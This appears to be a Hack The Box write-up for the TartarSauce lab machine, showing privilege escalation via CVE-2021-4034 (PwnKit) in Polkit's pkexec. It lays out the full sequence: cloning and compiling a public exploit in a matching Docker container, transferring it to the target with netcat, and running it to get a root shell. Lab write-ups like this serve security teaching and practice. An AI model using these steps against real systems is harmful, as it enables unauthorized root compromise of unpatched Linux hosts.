CVE-2021-4034
PEAS has discovered that the target system is vulnerable to CVE-2021-4034
The vulnerable program is a part of Polkit, which manages process privileges. Polkit’s pkexec allows for non-privileged processes to communicate with privileged ones, as well as instrumenting legitimate and authorized uses of privilege escalation similar to sudo.
A memory corruption flaw exists when no argument is passed to the function. By manipulating environment variables, an attacker can trick pkexec to load and execute arbitrary code with superuser privileges.
exploit pwnkit:
I Found an exploit online
I will download this to Kali
www-data@TartarSauce:/tmp$ gcc
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'Since the target system doesn’t have a compiler installed, I would have to compile the exploit remotely
Docker Exploit Development
┌──(kali㉿kali)-[~/…/htb/labs/tartarsauce/kernelbuster]
└─$ docker run -it --entrypoint "/bin/bash" --name tartarsauce i386/ubuntu:16.04
unable to find image 'i386/ubuntu:16.04' locally
16.04: Pulling from i386/ubuntu
1335d7ebdbbb: Pull complete
ffa6a227af79: Pull complete
ab3928723c2c: Pull complete
e468001dd2f3: Pull complete
digest: sha256:bcb8397f1390f4f0757ca06ce184f05c8ce0c7a4b5ff93f9ab029a581192917b
status: Downloaded newer image for i386/ubuntu:16.04The target system’s is running Ubuntu 16.04 with the architecture of i636, which is part of the x86 family.
The closest that I can get is i386
root@50c55465f9ca:/# ldd --version
ldd (Ubuntu GLIBC 2.23-0ubuntu11.3) 2.23
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.It matches that of the target system. All good to go.
root@50c55465f9ca:/# apt update -y ; apt install -y net-tools netcat nano gcc gcc-multilib make gitInstalling the necessary tools
root@50c55465f9ca:~# git clone https://github.com/berdav/CVE-2021-4034 ; cd CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
unpacking objects: 100% (92/92), done.
Checking connectivity... done.Getting the exploit itself.
root@50c55465f9ca:~/CVE-2021-4034# make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true gconv_path=./pwnkit.so:.Compilation complete.
root@50c55465f9ca:~/CVE-2021-4034# cd .. ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034Package up the whole directory for delivery
root@50c55465f9ca:~# nc 10.10.10.88 2222 < CVE-2021-4034.tar.gz
www-data@tartarsauce:/tmp$ nc -nlvp 2222 > CVE-2021-4034.tar.gz
Listening on [0.0.0.0] (family 0, port 2222)
Connection from [10.10.14.10] port 2222 [tcp/*] accepted (family 2, sport 44792)Delivery complete.
Exploitation
www-data@TartarSauce:/tmp$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034Unpack the archive and get to the exploit directory
www-data@TartarSauce:/tmp/CVE-2021-4034$ ./cve-2021-4034Execute.
# whoami
whoami
root
# hostname
hostname
TartarSauce
# ifconfig
ifconfig
ens192 Link encap:Ethernet HWaddr 00:50:56:b9:55:4f
inet addr:10.10.10.88 Bcast:10.10.10.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1297144 errors:0 dropped:86 overruns:0 frame:0
TX packets:1290102 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:281040868 (281.0 MB) TX bytes:608855917 (608.8 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:39552 errors:0 dropped:0 overruns:0 frame:0
TX packets:39552 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2933888 (2.9 MB) TX bytes:2933888 (2.9 MB)System Level Compromise